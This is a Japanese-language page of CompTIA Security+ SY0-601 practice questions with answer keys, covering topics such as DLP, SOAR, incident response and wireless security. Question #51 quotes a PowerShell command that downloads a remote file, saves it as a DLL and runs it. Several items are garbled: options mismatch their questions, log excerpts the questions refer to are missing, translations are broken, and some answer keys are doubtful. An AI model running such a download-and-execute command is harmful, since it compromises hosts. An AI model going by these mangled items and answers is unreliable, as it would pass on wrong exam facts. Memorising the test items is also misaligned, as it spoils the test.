すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

SY0-601プラクティステストでCompTIA Security+試験に戦略的に備える

CompTIA Security+のSY0-601認定試験については、効果的な準備のために高品質の試験リソースへのアクセスが不可欠です。試験内容と出題範囲を正確に反映した模擬試験問題と解答により、さらに学習が必要な分野を特定することができます。包括的なスタディガイドでは、リスク管理、インシデント対応、暗号化、セキュリティアーキテクチャなどのトピックについて詳しく解説しています。信頼できるソースからのビデオコースは、重要な概念を強化するための魅力的な方法を提供します。実際の試験環境をシミュレートした模擬試験は、時間管理スキルと試験形式に慣れるのに役立ちます。これらの試験リソースで定期的に練習することで、SY0-601 試験で扱われるセキュリティの基礎の理解を深めることができます。さまざまな学習教材、練習問題、模擬試験を準備に取り入れることで、CompTIA Security+認定試験に合格する可能性が高まります。
他のオンライン試験を受ける

質問 #1
情報セキュリティ最高責任者は、公共のUSB充電スタンドを使用する際に、従業員の携帯電話から機密情報が流出するのを防ぎたいと考えています。実施するソリューションとして最も適切なものはどれか。
A. DLP
B. USBデータブロッカー
C. USB OTG
D. USBポートを無効にする
回答を見る
正解: B
質問 #2
ある会社で最近、機密情報が競合他社に漏洩し、重大なデータ損失が発生した。同社は適切なラベルを使用することで特別な予防措置を講じたが、電子メール・フィルタのログにはインシデントの記録が残っていなかった。調査の結果、企業ネットワークは侵害されていませんでしたが、文書が従業員のCOPEタブレットからダウンロードされ、クラウドストレージ経由で競合他社に渡ったことが確認されました。このデータ漏えいに対する最善の修復策はどれですか?
A. ユーザートレーニング
B. CASB
C. MDM
D. DLP
回答を見る
正解: B
質問 #3
2つの組織が、それぞれの企業向けに新しいSIEMソリューションの評価を共同で行うことを計画している。両組織の SOC チームが協力することで、この作業をスピードアップできる。この合意を文書化するには、次のうちどれを書けばよいですか。
A. 覚書
B. ISA
C. SLA
D. NDA
回答を見る
正解: A
質問 #4
ある組織の最高経営責任者(CEO)は、パンデミック(世界的大流行)や危機の発生時 を含め、業務時間中いつでも在宅勤務できる柔軟性をスタッフに持たせたいと考えてい る。しかしCEOは、一部のスタッフがその柔軟性を利用して、休暇中にリスクの高い国で仕事をしたり、別の国の第三者機関に仕事を委託したりすることを懸念している。最高情報責任者(CIO)は、会社は基本的な管理策をいくつか導入することで、主要なリスクを軽減できると考えている。
A. A RATがインストールされ、追加のエクスプロイト・ツールを転送している。
B. ワークステーションは、コマンド&コントロールサーバーにビーコンを送っている。
C. ロジックボムが実行され、データ転送を担当。
D. ファイルレスウイルスがローカルネットワーク環境で広がっている
回答を見る
正解: AB
質問 #5
ネットワークエンジニアとセキュリティエンジニアが、ネットワーク運用を監視する方法について話し合っている。最も良い方法はどれか。
A. Telnetを無効にし、SSHを強制する。
B. 継続的なpingを確立する。
C. エージェントレスモニタを利用する
D. パスワード付きのSNMPv3を有効にします。
回答を見る
正解: C
質問 #6
次のうち、一般的に人間と人工知能の組み合わせを使ってイベントデータを分析し、介入することなく行動を起こすのはどれでしょう?
A. TTP
B. OSINT
C. SOAR
D. SIEM
回答を見る
正解: C
質問 #7
ある企業が、機密データを保存するすべてのアプリケーションにMFAを導入しようとしている。ITマネージャーは、MFAが無停止でユーザーフレンドリーであることを望んでいます。ITマネジャーがMFAを実装する際に使用すべきテクノロジは、次のうちどれですか?
A. ワンタイムパスワード
B. 電子メール・トークン
C. プッシュ通知
D. ハードウェア認証
回答を見る
正解: C
質問 #8
次の用語のうち、特定の組織にとって機密性の高い幅広い情報を表すものはどれか。
A. パブリック
B. トップシークレット
C. プロプライエタリ
D. オープンソース
回答を見る
正解: C
質問 #9
ある組織が、自然災害が発生した場合でも業務を維持できるよう、他のデータセンターの開設を計画している。次の検討事項のうち、組織の回復力を最も支援するものはどれですか?
A. 地理的分散
B. ジェネレーター電源
C. 消火
D. 設備の自動化
回答を見る
正解: A
質問 #10
データ漏洩を組織に最初に認識させるために使用されるコントロールは、次のうちどれですか?
A. 保護的
B. 予防的
C. 是正措置
D. 探偵
回答を見る
正解: D
質問 #11
ある組織の情報セキュリティマネージャが、PCI DSS の自己アセスメントを初めて実施します。このようなアセスメントを行う最も可能性の高い理由は次のうちどれですか?
A. 現在、国際的な拡大プロジェクトが進行中だ。
B. 外部のコンサルタントが、セキュリティ成熟度を測定するためにこのツールを利用する。
C. 組織はクレジットカード情報を処理することを期待している。
D. 政府規制当局からこの監査の完了を要請された。
回答を見る
正解: C
質問 #12
ある病院のネットワークに接続された磁気共鳴画像装置(MRI)スキャナーは、時代遅れでサポートされていないWindows専用OSによって制御・運用されている。この病院のIT管理者が専用OSをアップグレードするのを最も妨げているのはどれか。
A. MRIベンダーがシステムをアップグレードするのに必要な時間は、患者に悪影響を与える。
B. MRIベンダーが新しいバージョンのOSをサポートしていない。
C. OSを変更すると、MRIベンダーとのサポートSLAに違反する。
D. ITチームには、MRIスキャナーのアップグレードに必要な予算がない。
回答を見る
正解: B
質問 #13
ある攻撃者は、業務に影響を与える最善の方法は、サードパーティのソフトウェアベンダーに侵入することだと判断しました。悪用されるベクターはどれか。
A. ソーシャルメディア
B. クラウド
C. サプライチェーン
D. ソーシャル・エンジニアリング
回答を見る
正解: C
質問 #14
ある大規模MSSPのSOCが、解決に時間がかかりすぎた最近のインシデントから学んだ教訓について話し合うために会議を開いている。この種のインシデントはここ数週間で頻発するようになり、手動タスクの実行によりアナリストの時間が大量に消費されています。SOCがレスポンスタイムを改善するために考慮すべきソリューションは、次のうちどれでしょうか?
A. スイッチド・ポート・アナライザを使用してNIDSアプライアンスを構成します。
B. OSINTを収集し、中央リポジトリに成果物をカタログ化する。
C. カスタマイズ可能なプレイブックを使用してSOARを実装する。
D. コミュニティ主導の脅威インテリジェンスを備えたSIEMを導入する。
回答を見る
正解: C
質問 #15
あるセキュリティアナリストが、会社のデータが一般公開されているかどうかを確認するために、OSINTを使って情報を収集しています。このアナリストが使用するアプリケーションとして最適なものはどれか。
A. ザ・ハーベスター
B. カッコウ
C. Nmap(エヌマップ
D. ネサス
回答を見る
正解: A
質問 #16
組織が緩和策の優先順位を決定できるように、既知の脆弱性の計算値を提供するものはどれか。
A. CVSS
B. SIEM(シーム
C. SOAR
D. CVE
回答を見る
正解: A
質問 #17
ビジネスパートナーは、トランザクションを安全に検証するセキュリティメカニズムに取り組んでいる。要件は、トランザクションファイルの署名、暗号化、復号化に使用されるアーティファクトの登録と発行を行う、信頼できるソリューションの導入を1社が担当することです。採用するソリューションとして最も適切なものはどれか。
A. PKI
B. ブロックチェーン
C. SAML
D. OAuth
回答を見る
正解: A
質問 #18
財務情報を含むデータアーカイブに関連する既知のセキュリティリスクはどれか。
A. データは、規制ガイダンスで要求されている以上の期間アーカイブされると、負債になる可能性がある。
B. 情報漏えいを防ぎ、ビジネス要件を満たすために、データはオフサイトでアーカイブされなければならない。
C. 企業は、eディスカバリー要求にアーカイブデータを提供することを禁じられている。
D. 暗号化されていないアーカイブは、できるだけ長く保存し、暗号化すべきである。
回答を見る
正解: A
質問 #19
ある有名企業がAPTからの攻撃を受けている。この組織は、カスタムマルウェアが作成され、社内に電子メールで送信されたり、駐車場に落ちているUSBスティックにインストールされたりしていることを懸念しています。このシナリオに対する最善の防御策はどれか。
A. シグネチャベースのアンチウイルスを30分ごとに更新するように設定する
B. 電子メールにS/MIMEを適用し、USBドライブを挿入すると自動的に暗号化する。
C. 未知のソフトウェアに対するサンドボックス内でのアプリケーション実行の実装
D. 電子署名されていない新しいファイルに脆弱性がないかファジングする
回答を見る
正解: C
質問 #20
セキュリティコンプライアンス評価の一環として、監査人は自動脆弱性スキャンを実施する。また、評価を完了するために監査人が実施すべきことは、次のうちどれですか。
A. ユーザー行動分析
B. パケットキャプチャ
C. コンフィギュレーション・レビュー
D. ログ分析
回答を見る
正解: C
質問 #21
あるITセキュリティ・マネジャーが、一般に公開されている企業情報に関するレポートを要求してきた。管理者の懸念は、悪意のある行為者が積極的な偵察を行わずにデータにアクセスできるようになることです。分析を実行するための最も効率的なアプローチはどれか。
A. Harvesterツールにドメイン・パラメータを指定します。
B. dnsenumを使用してパブリックDNSエントリをチェックします。
C. 公開企業のIPをターゲットにNessusの脆弱性スキャンを実行する。
D. オプション「すべてのポートをスキャン」と「卑劣モード」を使ってnmapを実行する。
回答を見る
正解: A
質問 #22
あるセキュリティ・アナリストが、ネットワークのエッジで異常な量のトラフィックが発生していることに気づきました。ログを調べると、アナリストは送信元IPアドレスを特定し、そのアドレスがネットワークと通信しないようにブロックします。アナリストがこのアドレスをブロックしているにもかかわらず、攻撃はまだ続いており、多数の異なる送信元IPアドレスから来ています。このタイプの攻撃を説明するものはどれか。
A. DDoSについて
B. 特権の昇格
C. DNSポイズニング
D. バッファオーバーフロー
回答を見る
正解: A
質問 #23
次のうち、リスク移転の例はどれか?
A. 保険への加入
B. 脆弱なサーバーへのパッチ適用
C. 古いアプリケーションの削除
D. アプリケーション所有者のリスクサインオフ
回答を見る
正解: A
質問 #24
複数の人が一意のカードスワイプを使用し、安全な入り口に入場することを防ぐために使用できるセキュリティ管理は、次のうちどれですか?
A. 来場者ログ
B. ファラデーケージ
C. 出入管理前庭
D. 動体検知センサー
回答を見る
正解: C
質問 #25
ある小売企業のマーケティング部門は、社内のウェブサイトをインターネットに公開し、限られた特定の外部サービス・プロバイダーが安全な方法でアクセスできるようにしたいと考えています。この要件を満たすには、次の構成のうちどれがベストでしょうか?
A. NAC
B. ACL
C. WAF
D. NAT
回答を見る
正解: B
質問 #26
ある企業が、技術的なフットプリントを最小限に抑えるため、サーバーの一部をクラウドに移行しようとしている。同社は顧客関係管理システムを構内に設置している。次のソリューションのうち、最もインフラとアプリケーションのサポートが不要なものはどれでしょうか?
A. SaaS
B. IaaS
C. PaaS
D. SDN
回答を見る
正解: A
質問 #27
あるサイバーセキュリティアナリストが、Webサーバのログファイルを確認したところ、ディレクトリトラバーサル攻撃が発生したことを示す一連のファイルが見つかりました。アナリストが見ている可能性が最も高いのは次のうちどれですか?
A. http://sample
B. http://sample
C. http://sample
D. http://redirect
回答を見る
正解: B
質問 #28
あるセキュリティアーキテクトが、ビジネスパートナーのためにリモートアクセスソリューションを設計している。ビジネス・パートナーは、会社の Linux サーバ 1 台にアクセスする必要がある。ビジネスパートナーは、認証のためのパスワード管理とソフトウェアの追加インストールを避けたいと考えています。アーキテクトが推奨すべきはどれか。
A. ソフトトークン
B. スマートカード
C. CSR
D. SSHキー
回答を見る
正解: D
質問 #29
あるセキュリティアナリストが、リスクマネジメントプログラムを策定するために、ある規格を参照したいと考えている。このアナリストが使用する最も適切な情報源は次のうちどれですか。
A. SSAE SOC 2
B. ISO 31000
C. NIST CSF
D. GDPR
回答を見る
正解: B
質問 #30
インターネットに面したアプリケーションのコード開発をサードパーティの請負業者に委託する場合、最もセキュリティ上の懸念が大きいのはどれか。
A. 知的財産の窃盗
B. 昇格した特権
C. 未知のバックドア
D. 品質保証
回答を見る
正解: C
質問 #31
ソフトウェアに対する変更の追跡と文書化、およびファイルやシステムへのアクセス管理を説明する概念として、最も適切なものはどれか。
A. バージョン管理
B. 継続的モニタリング
C. ストアドプロシージャ
D. オートメーション
回答を見る
正解: A
質問 #32
不正なリムーバブルメディアへのアクセスを防止するために有効なツールはどれか。
A. USBデータブロッカー
B. ファラデーケージ
C. 近接リーダー
D. ケーブルロック
回答を見る
正解: A
質問 #33
あるセキュリティアナリストが、あるインシデント発生後、ウェブサーバの脆弱性スキャンレポートをレビューしている。そのサーバを悪用するために使用された脆弱性は、過去の脆弱性スキャンレポートに存在し、その脆弱性にはパッチが利用可能です。最も可能性の高い原因はどれか。
A. ユーザーへの影響により、セキュリティパッチがアンインストールされた。
B. 敵対者が脆弱性スキャンレポートを改ざんした。
C. ゼロデイ脆弱性がウェブサーバーを悪用した
D. スキャンの結果、脆弱性が誤って検出された。
回答を見る
正解: A
質問 #34
あるセキュリティアナリストが、IPアドレス10.10.1.1にあるWebサーバー上の不審なトラフィックを調査しています。WAFのログを検索すると、次の出力が見つかりました。
A. XSS攻撃
B. SQLi攻撃
C. リプレー攻撃
D. XSRF攻撃
回答を見る
正解: B
質問 #35
次のうち、組織全体の知識をより深く広く提供する方針はどれか?
A. 資産運用方針
B. 職務分離方針
C. 利用規定
D. ジョブ・ローテーション・ポリシー
回答を見る
正解: D
質問 #36
次のうち、温度調節のための検出と是正コントロールに最も適しているのはどれか?
A. 煙探知機
B. 火災警報器
C. HVACシステム
D. 消火システム
E. ガード
回答を見る
正解: C
質問 #37
あるセキュリティアナリストが、システム管理者が休暇に入るたびに特定のファイルが削除されていることに気づきました。実行されているマルウェアのタイプを最もよく表しているのは次のうちどれですか。
A. ファイルレスウイルス
B. 論理爆弾
C. キーロガー
D. ランサムウェア
回答を見る
正解: B
質問 #38
ネットワークからのデータ流出を阻止または防止するための有効な手段はどれか。
A. DLP
B. 防衛研究所
C. TPM
D. FDE
回答を見る
正解: A
質問 #39
あるウェブサイトの訪問者が、ウェブサイトのフォームの特定のフィールドに適切な書式で情報を提供することを要求されています。この義務に使用される可能性が最も高いセキュリティ対策は、次のうちどれでしょうか?
A. 入力バリデーション
B. コード署名
C. SQLインジェクション
D. フォーム提出
回答を見る
正解: A
質問 #40
あるセキュリティ管理者が、サーバー上で不要なサービスが実行されているのではないかと疑っています。その疑いを確認するために、管理者が最も使用しそうなツールはどれですか。
A. エヌマップ
B. ワイヤーシャーク
C. 検死
D. DNSEnum
回答を見る
正解: A
質問 #41
ある企業が公共エリアにWiFiアクセス・ポイントを配備し、よりセキュアにするために設定を強化しようとしている。評価を実施した後、アナリストは、アクセスポイントがWPA3、AES、WPS、およびRADIUSを使用するように構成されていることを確認します。アクセスポイントのセキュリティを強化するために、アナリストが無効にすべきものは次のうちどれですか。
A. WPA3
B. AES
C. RADIUS
D. WPS
回答を見る
正解: D
質問 #42
ある製造会社には、ソフトウェアの互換性の問題から、新しいOSに移行できない単発のレガシー情報システムがいくつかある。OSはベンダーによってまだサポートされているが、産業用ソフトウェアはもうサポートされていない。最高情報セキュリティ責任者は、これらのシステムに対して、OSのパッチを非稼働環境にインストールできるようにする一方で、復旧のためにシステムのバックアップを作成する弾力性プランを作成した。次のうち、どの復旧技術が有効か?
A. 冗長性
B. RAID 1+5
C. 仮想マシン
D. フルバックアップ
回答を見る
正解: C
質問 #43
新しいセキュリティ・エンジニアがシステムのハードニングを開始した。このエンジニアが使用しているハードニング手法のひとつに、NASへのリモートログインを無効にするというものがある。現在、ユーザーは、データがユーザーの PC からはまだ閲覧可能であるにもかかわらず、SCP を使用して NAS にファイルを転送できないことを報告しています。この問題の最も可能性の高い原因は次のうちどれですか?
A. ローカルホストでTFTPが無効になっている。
B. 設定ファイルを修正する代わりにSSHをオフにした。
C. sshd
D. ネットワークサービスがNAS上で実行されていない。
回答を見る
正解: B
質問 #44
ある組織が、最近、ソフトウェア保証ポリシーをリリースし、開発者に対し、 毎晩リポジトリ上でコードスキャンを実行することを義務付けた。最初の夜が明けてから、セキュリティチームは、2,000 件以上の発見が報告され、対処する必要があることを開発者に警告した。発見件数が多い最も可能性の高い原因は、次のうちどれですか?
A. 脆弱性スキャナーが適切に設定されておらず、誤検出が多かった。
B. サードパーティのライブラリがリポジトリにロードされているので、コードベースから削除する。
C. 脆弱性スキャナが実行時に複数のメモリリークを発見したため、同じ問題の報告が重複した。
D. 脆弱性スキャナに正しいベンチマークがロードされておらず、更新する必要がある。
回答を見る
正解: A
質問 #45
セキュリティ管理者がアクセススイッチのARPテーブルを調べると、次のような出力がある:
A. Fa0/2ポートへのDDoS
B. Fa0/2ポートでのMACフラッディング
C. Fa0/1ポートのARPポイズニング
D. ポートFa0/1のDNSポイズニング
回答を見る
正解: B
質問 #46
あるセキュリティアナリストが、会社のクラウド環境からデータを収集するために複数のセキュリティソリューションを承認するリスクを評価しています。これらの統合がもたらす直接的な影響は、次のうちどれでしょうか。
A. データ主権ルールの不遵守
B. ベンダーの相互運用性サポートの喪失
C. SIEMソリューションの導入の義務化
D. 攻撃対象の増加
回答を見る
正解: D
質問 #47
次のうち、テールゲーティングに対して最も有効な対策はどれか?
A. 出入管理前庭
B. 閉回路テレビ
C. 近接カードリーダー
D. ファラデーケージ
回答を見る
正解: A
質問 #48
あるセキュリティアナリストが、組織の脆弱性の重大度レベルをリーダーシップチームに伝えるためのソリューショ ンを探している。このニーズに最も適しているのはどれか。
A. CVE
B. SIEM(シーム
C. SOAR
D. CVSS
回答を見る
正解: D
質問 #49
次のコンポーネントのうち、単一のファイアウォールを介して複数のクラウド環境へのインバウンド・インターネット・トラフィックを統合して転送するために使用できるものはどれですか?
A. トランジット・ゲートウェイ
B. クラウド・ホットサイト
C. エッジコンピューティング
D. DNSシンクホール
回答を見る
正解: A
質問 #50
ある組織では、運用状態に移行する前にパッチを開発し、テストする環境をいくつか維持している。運用状態に移行する直前にパッチが展開される環境は、次のうちどれですか。
A. 開発
B. テスト
C. プロダクション
D. ステージング
回答を見る
正解: D
質問 #51
ある従業員が、Updates.lnkという異常なファイルが添付された電子メールを受信した。セキュリティアナリストは、このファイルが何を行うかをリバースエンジニアリングしており、このファイルが次のスクリプトを実行することを発見しました:C:˶WindowsSystem32WindowsPowerShellv1.0powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process rundl132.exe $env:TEMPautoupdate.dllアナリストが発見したことを最もよく説明しているのはどれですか?
A. PowerShellコードがDLLインジェクションを実行している。
B. PowerShellコードが画像を表示している。
C. PowerShellコードが環境変数を設定している。
D. PowerShellコードがWindows Updateの設定を変更しています。
回答を見る
正解: A
質問 #52
あるホストがマルウェアに感染したため、セキュリティ・アナリストがコンピュータのログを調べている。コンピュータが感染した後、エラー画面が表示され、シャットダウンしました。より多くの情報を得るために、アナリストが最初に確認すべきはどれか。
A. ダンプファイル
B. システムログ
C. ウェブ・アプリケーション・ログ
D. セキュリティログ
回答を見る
正解: A
質問 #53
次のうち、機器が壊れるまでの平均稼働時間を示すものはどれか?
A. SLE
B. MTBF
C. RTO
D. ARO
回答を見る
正解: B
質問 #54
パブリッククラウドでアプリケーションをホスティングする場合に特に関連するリスクは、次のうちどれですか?
A. 無担保ルート口座
B. ゼロデイ
C. シェア・テナント
D. インサイダーの脅威
回答を見る
正解: C
質問 #55
攻撃者は電子署名された文書を、気づかれないように別のバージョンに置き換える。文書の内容を確認すると、作成者は文書に元々なかった文言が追加されていることに気づくが、完全性の問題を検証することはできない。次のどの攻撃が使われましたか?
A. クリプトマルウェア
B. ハッシュ置換
C. 衝突
D. フィッシング
回答を見る
正解: B
質問 #56
セキュリティエンジニアは、オフィスのスイートルームに2台のワイヤレスルーターを配備しなければなりません。オフィスビル内の他のテナントがこのワイヤレスネットワークに接続できないようにする必要があります。最も強力な暗号化を保証するために、エンジニアが実装すべきプロトコルは次のうちどれですか?
A. WPS
B. WPA2
C. WAP
D. HTTPS
回答を見る
正解: B
質問 #57
セキュリティインシデントが解決されました。インシデント対応計画の最終段階の重要性を最もよく表しているのはどれか。
A. チームがどれだけうまく対応できたかを検証し、文書化する。
B. システムのパッチが完全に適用され、データが復元され、脆弱性に対処された後、影響を受けたシステムを本番稼動に戻す。
C. インシデントと侵害の範囲、本番環境への影響、侵入ポイントを特定する。
D. 影響を受けたシステムを封じ込め、ネットワークから切り離し、攻撃や侵害のさらなる拡大を防ぐ。
回答を見る
正解: A
質問 #58
ファイルのハッシュを公開する理由はどれか?
A. ファイルの完全性を検証する
B. ソフトウェアがデジタル署名されているかどうかを確認する
C. ハッシュをソフトウェアのアクティベーション・キーとして使用する。
D. ハッシュを復号パスフレーズとして使用する。
回答を見る
正解: A
質問 #59
オンラインストリーミングサービスを提供する企業が、顧客の氏名やメールアドレスなどの個人情報をクラウドストレージサービスで公開した。その結果、ユーザーアカウントの削除依頼が増加した。このデータ公開の結果を最もよく表しているのはどれか。
A. 規制当局による罰金
B. 評判の低下
C. 保険料の増加
D. 経済的損失
回答を見る
正解: B
質問 #60
不正取引による損失を削減するために、経理部門で使用する管理タイプとしてBESTなのはどれか。
A. 回復
B. 抑止力
C. 是正措置
D. 探偵
回答を見る
正解: D
質問 #61
あるセキュリティアナリストが、会社のSIEMから192.168.34.26というローカルソースIPアドレスから異常なアクティビティが発生しているというアラートを受け取った。情報セキュリティ最高責任者は、アナリストに発信元をブロックするよう依頼する。数日後、別の従業員が、脆弱性スキャンが適切に実行されなくなったという社内チケットを発行した。その従業員が提供したIPアドレスは192.168.34.26です。このタイプのアラートを説明するものはどれか。
A. 真陰性
B. トゥルー・ポジティブ
C. 偽陽性
D. 偽陰性
回答を見る
正解: C
質問 #62
ある企業は、日常業務を中断することなく、意思決定ポイントと関連するインシデント対応アクションをテストする実世界のシナリオを使用して、更新したインシデント対応計画を検証する必要があります。この企業の要件を満たすものは、次のうちどれが最適でしょうか?
A. レッドチーム演習
B. 旗取り訓練
C. 卓上エクササイズ
D. フィッシング演習
回答を見る
正解: C
質問 #63
ある組織の最高セキュリティ責任者(CSO)は、インシデント対応計画の妥当性と徹底性を確保するために、インシデント対応計画に事業者が関与していることを検証したいと考えています。CSOが使用する可能性が最も高いのは、次のうちどれですか?
A. 外部セキュリティ評価
B. バグ報奨金プログラム
C. 卓上練習
D. レッドチーム・エンゲージメント
回答を見る
正解: C
質問 #64
ある大手製造業が社内インフラを更新し、つい最近OAuthアプリケーションによる企業データへのアクセスを許可し始めた。データ漏えいが報告されています。この問題を引き起こした可能性が最も高いのは次のうちどれですか?
A. 特権クリープ
B. 変更されていないデフォルト設定
C. TLSプロトコルの脆弱性
D. 不適切なパッチ管理
回答を見る
正解: B
質問 #65
ある小売企業の幹部が、最近、大手競合企業に転職した。翌週、セキュリティアナリストがセキュリティログを確認したところ、退職した役員のアカウントへのログオン試行が成功したことが判明しました。次のセキュリティ対策のうち、どれがこの問題に対処できたでしょうか?
A. 秘密保持契約
B. 最低特権
C. 利用規定
D. オフボーディング
回答を見る
正解: D
質問 #66
あるセキュリティ・アナリストが、侵入テストの報告書を調査している。侵入テストの間、コンサルタントはバックエンドサーバから機密データをダウンロードすることができた。バックエンドサーバは、会社のモバイルアプリケーションからのみ利用できるはずの API を公開していた。バックエンドサーバのログを確認したところ、セキュリティアナリストは以下のエントリを発見しました。
A. IPアドレス許可リスト
B. ユーザーエージェント・スプーフィング
C. WAFバイパス
D. リファラー操作
回答を見る
正解: B
質問 #67
一貫性があり監査可能なインシデント対応プロセスを育成するための最善の行動はどれか。
A. 新入社員には、外部の知識で常に文書を更新するよう奨励する。
B. 組織が容易にアクセスできる中央リポジトリに文書を公開する。
C. プロセスについてコメントする資格を、各ITサイロの主題専門家に限定する。
D. CIRTのメンバーを交代させ、組織内の責任共有モデルを育成する。
回答を見る
正解: D
質問 #68
ある企業が、小売店のウェブサイトをパブリック・クラウド・プロバイダーに移行しようとしている。同社はクレジットカード情報をトークン化したいが、クラウドプロバイダーには保存されたクレジットカード情報を見せないようにしたい。このような目的に最も適しているのは、次のうちどれでしょうか?
A. WAF
B. CASB
C. VPN
D. TLS
回答を見る
正解: B
質問 #69
ある企業が、証明書の管理プロセスを簡素化したいと考えている。この会社には、単一のドメインに数十のサブドメインがあり、そのすべてがインターネット上で一般に公開されています。この会社が導入すべき証明書のタイプとして、最も適切なものはどれですか。
A. 主題の別名
B. ワイルドカード
C. 自己署名
D. ドメインバリデーション
回答を見る
正解: B
質問 #70
あるセキュリティアナリストがhost1.pcapという名前のファイルを作成し、それをインシデント分析のために使用しようとしているチームメンバーと共有しました。他のチームメンバーがこのファイルを開くために使用する可能性が最も高いツールはどれですか?
A. 解剖
B. メムダンプ
C. FTKイメージャー
D. ワイヤーシャーク
回答を見る
正解: D
質問 #71
あるデータセットの責任者が、ハードディスク上のデータに暗号化を適用するよう、セキュ リティエンジニアに依頼した。セキュリティ・エンジニアは__________の一例である。
A. データ管理者
B. データ所有者
C. データ管理者
D. データプロセッサー
回答を見る
正解: C
質問 #72
セキュリティ管理者は、企業のファイアウォールを使用してTCP接続をブロックする必要がある。この接続は潜在的に脅威であるため、管理者はRSTを送り返したくありません。ファイアウォールルールの次のアクションのうち、最も効果的なものはどれですか。
A. ドロップ
B. 却下
C. ログアラート
D. 許可
回答を見る
正解: A
質問 #73
セキュリティ管理者は、企業ネットワーク上の転送中のファイルを検査し、PII、クレジットカードデータ、および分類語を検索する必要があります。次のうち、どれを使用するのがベストでしょうか?
A. IDSソリューション
B. EDRソリューション
C. HIPSソフトウェア・ソリューション
D. ネットワークDLPソリューション
回答を見る
正解: D
質問 #74
HOTSPOT (Drag and Dropはサポートされていません)本番環境でインシデントが発生しました。INSTRUCTIONSコマンド出力を分析し、侵害のタイプを特定します。シミュレーションの初期状態に戻したい場合は、Reset Allボタンをクリックしてください:
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #75
次のうち、特定の業界やグループ内のユーザーを危険にさらすことを目的とした標的型攻撃はどれか。
A. 水飲み場
B. タイポスクワッティング
C. デマ
D. なりすまし
回答を見る
正解: A
質問 #76
ある企業は、クラウド上にフラットなネットワークを構築している。新しいネットワークにサーバーを移行することなく、本番サーバーと非本番サーバーをセグメント化するソリューションを導入する必要がある。同社が実装すべきソリューションはどれか。
A. イントラネット
B. 選別されたサブネット
C. VLANセグメンテーション
D. 信頼ゼロ
回答を見る
正解: C
質問 #77
ある政府機関に勤務するセキュリティ管理者は、分類ときめ細かな計画を利用して最高機密データを保護し、知る必要がある場合にアクセスを許可したいと考えています。管理者が考慮すべきアクセス制御スキーマはどれか。
A. 必須
B. ルールベース
C. 裁量
D. 役割ベース
回答を見る
正解: A
質問 #78
セキュリティ評価中に、あるセキュリティアナリストが、パーミッションが過剰なファイルを発見した。次のツールのどれを使用すると、アナリストは既存のユーザーとグループのパーミッションを減らし、ファイルからset-user-IDビットを削除できますか?
A. ls
B. chflags
C. chmod
D. lsof
E. setuid
回答を見る
正解: C
質問 #79
IDSとWAFがHTTPSトラフィックに対して有効であるために必要なものはどれか。
A. ハッシング
B. DNSシンクホール
C. TLS検査
D. データマスキング
回答を見る
正解: C
質問 #80
ネットワークエンジニアが、ユーザーから報告されたワイヤレスネットワーク接続の問題をトラブルシューティングしています。この問題は、駐車場に最も近い建物のセクションでのみ発生しています。ユーザーがウェブサイトにアクセスする際、断続的に速度が低下し、ネットワークドライブに接続できない。この問題は、ノートパソコン利用者がビルの他のエリアでデバイスを使用した後、デスクに戻ると増加するようだ。また、ノートPCを使用する際に、デスクに入室する必要があるとの報告もある。
A. 外部のアクセスポイントが邪悪なツイン攻撃をしている。
B. そのセクションのWAPの信号を増やす必要がある。
C. デバイスの証明書の有効期限が切れたため、再インストールする必要がある。
D. そのセクションのユーザーは、ファイアウォールでブロックされているVLANにいる
回答を見る
正解: A
質問 #81
ある組織は、ハッカーが施設に侵入し、リモートアクセス可能な Kali Linux ボックスをプラグインする可能性を懸念しています。このような攻撃に対する最初の防御線はどれになるでしょうか?(2つ選びなさい)
A. ソーシャルメディア分析
B. 年次情報セキュリティ研修
C. ゲーミフィケーション
D. フィッシング・キャンペーン
回答を見る
正解: BC
質問 #82
あるセキュリティ管理者は、すべてのクラウドサーバに、脆弱性スキャンと継続的な監視を容易にするためのソフトウェアがプリインストールされていることを保証したいと考えている。管理者が利用すべきコンセプトはどれか。
A. プロビジョニング
B. ステージング
C. ステージング
D. 品質保証
回答を見る
正解: A
質問 #83
ソフトウェアに組み込まれたサードパーティ製ライブラリに存在するセキュリティ上の欠陥を、製品としてリリースされる前に検出する最も効果的な方法はどれか。
A. サーバー側とクライアント側で異なる検証テクニックを使用する
B. サードパーティライブラリには別のバージョン管理システムを使用する。
C. 脆弱性スキャンを実施し、SDLC の早い段階で依存関係を評価する。
D. ソフトウェアリリース前のペネトレーションテストの回数を増やす
回答を見る
正解: C
質問 #84
認証に SAML を使用しているのは、次のうちどれですか。
A. TOTP
B. 連盟
C. ケルベロス
D. ホットプ
回答を見る
正解: B
質問 #85
シミュレーションシステム管理者は、認証されたゲストアクセスのために新しいワイヤレスネットワークをインストールする必要があります。このワイヤレスネットワークは、利用可能な最も安全な暗号化とプロトコルを使用して802.1Xをサポートする必要があります。ゲストADの認証情報は次のとおりです:User: guest01Password: guestpassシミュレーションの初期状態に戻したい場合は、いつでもクリックしてください。
A. 以下の説明を参照のこと。
回答を見る
正解: A
質問 #86
セキュリティアナリストが、誰かが appadmin テストアカウントにログインしたという SIEM アラートを受信しました。セキュリティアナリストは、次のアプリケーションログを確認します。
A. アプリケーションに対してリプレイ攻撃が行われている。
B. ユーザー認証システムに対してインジェクション攻撃が行われている。
C. サービスアカウントのパスワードが変更され、アプリケーション内でログインに失敗し続けた可能性がある。
D. 認証された脆弱性スキャナ攻撃は、アプリケーションに対して複数の CVE をテストしています。
回答を見る
正解: B
質問 #87
次のうち、コードを書いたらすぐにメインのコードベースに含めるのはどれか?
A. 継続的モニタリング
B. 継続的デプロイメント
C. 継続的検証
D. 継続的インテグレーション
回答を見る
正解: D
質問 #88
ある企業が、欧州の顧客の個人情報の取り扱い方法を監査しています。同社が相談すべきは次のうちどれでしょうか?
A. GDPR
B. ISO
C. NIST
D. PCI DSS
回答を見る
正解: A
質問 #89
ある組織が、ネットワーク上でマルウェアが発生したため、インシデント対応計画を発動した。この組織は、フォレンジックチームを導入し、最初の侵害の可能性が高いポイントとして、インターネットに面したWindowsサーバを特定した。検出されたマルウェアファミリーは、サーバーに手動でログオンし、悪意のあるコードを実行することで配布されることが知られている。感染ベクトルからの再感染を防ぐために、次のアクションのうちどれがBESTでしょうか?
A. 内部ネットワークからのTFTP経由の接続を防止する。
B. インターネットからサーバーへの22をブロックするファイアウォールルールを作成する。
